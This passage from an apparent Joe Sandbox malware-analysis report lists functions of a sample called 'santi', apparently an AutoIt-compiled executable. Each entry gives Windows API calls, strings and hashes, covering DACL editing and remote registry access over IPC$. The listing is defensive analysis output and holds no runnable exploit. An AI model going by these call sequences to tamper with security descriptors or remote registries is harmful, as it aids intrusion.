                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0034BEF4,?,?,00000000,?), ref: 0034E776
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0034BEF4,?,?,00000000,?), ref: 0034E783
                                                                • GlobalLock.KERNEL32(00000000), ref: 0034E78C
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0034BEF4,?,?,00000000,?), ref: 0034E79B
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0034E7A4
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0034BEF4,?,?,00000000,?), ref: 0034E7AB
                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0034BEF4,?,?,00000000,?), ref: 0034E7BC
                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,0036D9BC,?), ref: 0034E7D5
                                                                • GlobalFree.KERNEL32(00000000), ref: 0034E7E5
                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0034E809
                                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0034E834
                                                                • DeleteObject.GDI32(00000000), ref: 0034E85C
                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0034E872
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                • String ID:
                                                                • API String ID: 3840717409-0
                                                                • Opcode ID: 9fc683bfe1fb75324b26322d0728d967aa5b00fcc974e62826ada97f331592b9
                                                                • Instruction ID: 0f61a95ace0ad2e106feae8cbb9c7f8f87a20ada121722df1aca06d45f0aa547
                                                                • Opcode Fuzzy Hash: 9fc683bfe1fb75324b26322d0728d967aa5b00fcc974e62826ada97f331592b9
                                                                • Instruction Fuzzy Hash: 97413A75A00204EFDB129F65DC48EAA7BBCFF89B21F108458F906DB260D7B1AD41DB20
                                                                Function 003305F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __wsplitpath.LIBCMT ref: 0033076F
                                                                • _wcscat.LIBCMT ref: 00330787
                                                                • _wcscat.LIBCMT ref: 00330799
                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003307AE
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003307C2
                                                                • GetFileAttributesW.KERNEL32(?), ref: 003307DA
                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 003307F4
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00330806
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                • String ID: *.*
                                                                • API String ID: 34673085-438819550
                                                                • Opcode ID: 70eb6d2788e1e214b49183b6ccab0a3d2dc70dfff7523a326d787e5cb6dc724b
                                                                • Instruction ID: a7fa4ba385fcb2367d80df20df251f577f429a29777951427e609281187034dd
                                                                • Opcode Fuzzy Hash: 70eb6d2788e1e214b49183b6ccab0a3d2dc70dfff7523a326d787e5cb6dc724b
                                                                • Instruction Fuzzy Hash: 3E81AF716043459FCB29DF64C8A696EB3E8FB88304F15882EF889DB251E734D954CB92
                                                                Function 0034EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0034EF3B
                                                                • GetFocus.USER32 ref: 0034EF4B
                                                                • GetDlgCtrlID.USER32(00000000), ref: 0034EF56
                                                                • _memset.LIBCMT ref: 0034F081
                                                                • GetMenuItemInfoW.USER32 ref: 0034F0AC
                                                                • GetMenuItemCount.USER32(00000000), ref: 0034F0CC
                                                                • GetMenuItemID.USER32(?,00000000), ref: 0034F0DF
                                                                • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0034F113
                                                                • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0034F15B
                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0034F193
                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0034F1C8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                • String ID: 0
                                                                • API String ID: 1296962147-4108050209
                                                                • Opcode ID: 48315379e06f6176dc899c9855162879938ccba25f20597430760b77beea2497
                                                                • Instruction ID: 380aefdeb5601e1f0cca9e838ee6daa23fdb0dab401873eb14a668cc30a2c20d
                                                                • Opcode Fuzzy Hash: 48315379e06f6176dc899c9855162879938ccba25f20597430760b77beea2497
                                                                • Instruction Fuzzy Hash: 7E819D71604311EFDB12CF14C884A6BBBE8FF88314F09492EF9959B291D770E905CBA2
                                                                Function 0031A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0031ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0031ABD7
                                                                  • Part of subcall function 0031ABBB: GetLastError.KERNEL32(?,0031A69F,?,?,?), ref: 0031ABE1
                                                                  • Part of subcall function 0031ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0031A69F,?,?,?), ref: 0031ABF0
                                                                  • Part of subcall function 0031ABBB: HeapAlloc.KERNEL32(00000000,?,0031A69F,?,?,?), ref: 0031ABF7
                                                                  • Part of subcall function 0031ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0031AC0E
                                                                  • Part of subcall function 0031AC56: GetProcessHeap.KERNEL32(00000008,0031A6B5,00000000,00000000,?,0031A6B5,?), ref: 0031AC62
                                                                  • Part of subcall function 0031AC56: HeapAlloc.KERNEL32(00000000,?,0031A6B5,?), ref: 0031AC69
                                                                  • Part of subcall function 0031AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0031A6B5,?), ref: 0031AC7A
                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0031A8CB
                                                                • _memset.LIBCMT ref: 0031A8E0
                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0031A8FF
                                                                • GetLengthSid.ADVAPI32(?), ref: 0031A910
                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0031A94D
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0031A969
                                                                • GetLengthSid.ADVAPI32(?), ref: 0031A986
                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0031A995
                                                                • HeapAlloc.KERNEL32(00000000), ref: 0031A99C
                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0031A9BD
                                                                • CopySid.ADVAPI32(00000000), ref: 0031A9C4
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0031A9F5
                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0031AA1B
                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0031AA2F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                • String ID:
                                                                • API String ID: 3996160137-0
                                                                • Opcode ID: 20ef051115546d0f3b26e7027f5d97d719bca136665f869f71aaed514ff886d4
                                                                • Instruction ID: 2b46bfd58465f2fd6ee50bec75f18ac1c06caa1f0b3300373d604d44f6504426
                                                                • Opcode Fuzzy Hash: 20ef051115546d0f3b26e7027f5d97d719bca136665f869f71aaed514ff886d4
                                                                • Instruction Fuzzy Hash: 38518FB1A01609AFDF16CF90DD44EEEBBB9FF08301F048119F811AB290DB749A45CB61
                                                                Function 00339DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 00339E36
                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00339E42
                                                                • CreateCompatibleDC.GDI32(?), ref: 00339E4E
                                                                • SelectObject.GDI32(00000000,?), ref: 00339E5B
                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00339EAF
                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00339EEB
                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00339F0F
                                                                • SelectObject.GDI32(00000006,?), ref: 00339F17
                                                                • DeleteObject.GDI32(?), ref: 00339F20
                                                                • DeleteDC.GDI32(00000006), ref: 00339F27
                                                                • ReleaseDC.USER32(00000000,?), ref: 00339F32
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                • String ID: (
                                                                • API String ID: 2598888154-3887548279
                                                                • Opcode ID: dec70ca7d247d90206d45c9e7398a1d4a6a2e9511e1c88c38d0c578da6ddefd5
                                                                • Instruction ID: 4632de28cc82d743794aba21b153a6f4bf76ec4b436c81023f6f59ab3e38230e
                                                                • Opcode Fuzzy Hash: dec70ca7d247d90206d45c9e7398a1d4a6a2e9511e1c88c38d0c578da6ddefd5
                                                                • Instruction Fuzzy Hash: 02515D71A04309EFCB15CFA9DC85EAEBBB9EF49710F14841DF95997210C771A840CB60
                                                                Function 0032CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LoadString__swprintf_wprintf
                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                • API String ID: 2889450990-2391861430
                                                                • Opcode ID: 6adfc1e626a78f7ec5c39bbfbdafe6b91f874cdeed003d06b60f86722e68093c
                                                                • Instruction ID: b8a38e644ac019b970a3211f199386dd6b498f012d617f6bab591897b2519ef9
                                                                • Opcode Fuzzy Hash: 6adfc1e626a78f7ec5c39bbfbdafe6b91f874cdeed003d06b60f86722e68093c
                                                                • Instruction Fuzzy Hash: 9A51ED72850169BACF16EBE0DD42EEEB778AF08304F600065F505760A2EB306F69CF60
                                                                Function 0032CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LoadString__swprintf_wprintf
                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                • API String ID: 2889450990-3420473620
                                                                • Opcode ID: a4cdb5680e2d434dba0cce5e5dd82ba3e1e9a7f4b04f794978d7e00fc8429b0c
                                                                • Instruction ID: 29e2e111e8a76df5c523da13b51570e6c1e12c0dc9fb4101ee3dad6273bdbc57
                                                                • Opcode Fuzzy Hash: a4cdb5680e2d434dba0cce5e5dd82ba3e1e9a7f4b04f794978d7e00fc8429b0c
                                                                • Instruction Fuzzy Hash: 4A51F072850269BACF16EBE1DD42EEEB778AF04344F500065F109760A2EB746F69CF60
                                                                Function 00343C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00342BB5,?,?), ref: 00343C1D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper
                                                                • String ID: $E9$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                • API String ID: 3964851224-4260666270
                                                                • Opcode ID: 199a794fb5f8c150b2d78de90e3ec4babe7ba5088a3a85715cee8671f98b72bb
                                                                • Instruction ID: b2fa28784210a1583872186d8afcb66d01687f92e42df8b738dd082ec6f9a915
                                                                • Opcode Fuzzy Hash: 199a794fb5f8c150b2d78de90e3ec4babe7ba5088a3a85715cee8671f98b72bb
                                                                • Instruction Fuzzy Hash: 30415E3451028A8BDF16EF54D851AEB73A5AF23740F524825FC551F2A2EB70AE1BCF10
                                                                Function 003255BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 003255D7
                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00325664
                                                                • GetMenuItemCount.USER32(003A1708), ref: 003256ED
                                                                • DeleteMenu.USER32(003A1708,00000005,00000000,000000F5,?,?), ref: 0032577D
                                                                • DeleteMenu.USER32(003A1708,00000004,00000000), ref: 00325785
                                                                • DeleteMenu.USER32(003A1708,00000006,00000000), ref: 0032578D
                                                                • DeleteMenu.USER32(003A1708,00000003,00000000), ref: 00325795
                                                                • GetMenuItemCount.USER32(003A1708), ref: 0032579D
                                                                • SetMenuItemInfoW.USER32(003A1708,00000004,00000000,00000030), ref: 003257D3
                                                                • GetCursorPos.USER32(?), ref: 003257DD
                                                                • SetForegroundWindow.USER32(00000000), ref: 003257E6
                                                                • TrackPopupMenuEx.USER32(003A1708,00000000,?,00000000,00000000,00000000), ref: 003257F9
                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00325805
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                • String ID:
                                                                • API String ID: 3993528054-0
                                                                • Opcode ID: 3042f30c9483d8594a75afb07c64347aa64b080001733dfc85b0fb5f47d9a700
                                                                • Instruction ID: a2661cb5ba0e7b3efe10b7b14281b3135e0c9d492fb9d25f2c6bd4df7c5a5382
                                                                • Opcode Fuzzy Hash: 3042f30c9483d8594a75afb07c64347aa64b080001733dfc85b0fb5f47d9a700
                                                                • Instruction Fuzzy Hash: 0C710370740625BFEB229F58EC49FAABF69FF01768F244205F6196A1E0C7B16D10DB90
                                                                Function 0031A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 0031A1DC
                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0031A211
                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0031A22D
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0031A249
                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0031A273
                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0031A29B
                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0031A2A6
                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0031A2AB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                • API String ID: 1687751970-22481851
                                                                • Opcode ID: b95f5ab6e06018073c46d6c9df17f312dd9fd82c17aab46cefe7f6c27f10baa0
                                                                • Instruction ID: 242081a60f5f6b347f5c189ec383d3efc970ecad9a3b92b92f477e44debbfd34
                                                                • Opcode Fuzzy Hash: b95f5ab6e06018073c46d6c9df17f312dd9fd82c17aab46cefe7f6c27f10baa0
                                                                • Instruction Fuzzy Hash: AD411876C21629ABCF16EBA5DC85DEEB778BF18344F404029E901A7160EB709E55CF50
                                                                Function 003267E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __swprintf.LIBCMT ref: 003267FD
                                                                • __swprintf.LIBCMT ref: 0032680A
                                                                  • Part of subcall function 0030172B: __woutput_l.LIBCMT ref: 00301784
                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 00326834
                                                                • LoadResource.KERNEL32(?,00000000), ref: 00326840
                                                                • LockResource.KERNEL32(00000000), ref: 0032684D
                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 0032686D
                                                                • LoadResource.KERNEL32(?,00000000), ref: 0032687F
                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0032688E
                                                                • LockResource.KERNEL32(?), ref: 0032689A
                                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003268F9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                • String ID: 59
                                                                • API String ID: 1433390588-419814946
                                                                • Opcode ID: 7fcfcafef949fa71411cdc1a9d3e8c874a2e8b471ddc35665db98b323df6b849
                                                                • Instruction ID: 24b5bc7f61cd53b4314e122cf3275f9d9b389ebf281699b5bd03f63f4db99226
                                                                • Opcode Fuzzy Hash: 7fcfcafef949fa71411cdc1a9d3e8c874a2e8b471ddc35665db98b323df6b849
                                                                • Instruction Fuzzy Hash: 0A31B2B1A0122AABDB129F61ED56EBF7BACFF08340F008825F902D2150E770D951DBB0
                                                                Function 003225B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003536F4,00000010,?,Bad directive syntax error,0037DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003225D6
                                                                • LoadStringW.USER32(00000000,?,003536F4,00000010), ref: 003225DD
                                                                • _wprintf.LIBCMT ref: 00322610
                                                                • __swprintf.LIBCMT ref: 00322632
                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003226A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                • API String ID: 1080873982-4153970271
                                                                • Opcode ID: bf68e8efb0aa9433f90f08392cb04a6e05ccb28b6315051a6d3fae494cc07c63
                                                                • Instruction ID: e47a11a5602382ef121888d12b52c814c3ddc43b9cc98f59315cf2799001c20c
                                                                • Opcode Fuzzy Hash: bf68e8efb0aa9433f90f08392cb04a6e05ccb28b6315051a6d3fae494cc07c63
                                                                • Instruction Fuzzy Hash: F921717295026ABFCF12AF90CC4AEEE7B39BF18308F444455F505660A2DBB1A625DF50
                                                                Function 00327AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00327B42
                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00327B58
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00327B69
                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00327B7B
                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00327B8C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
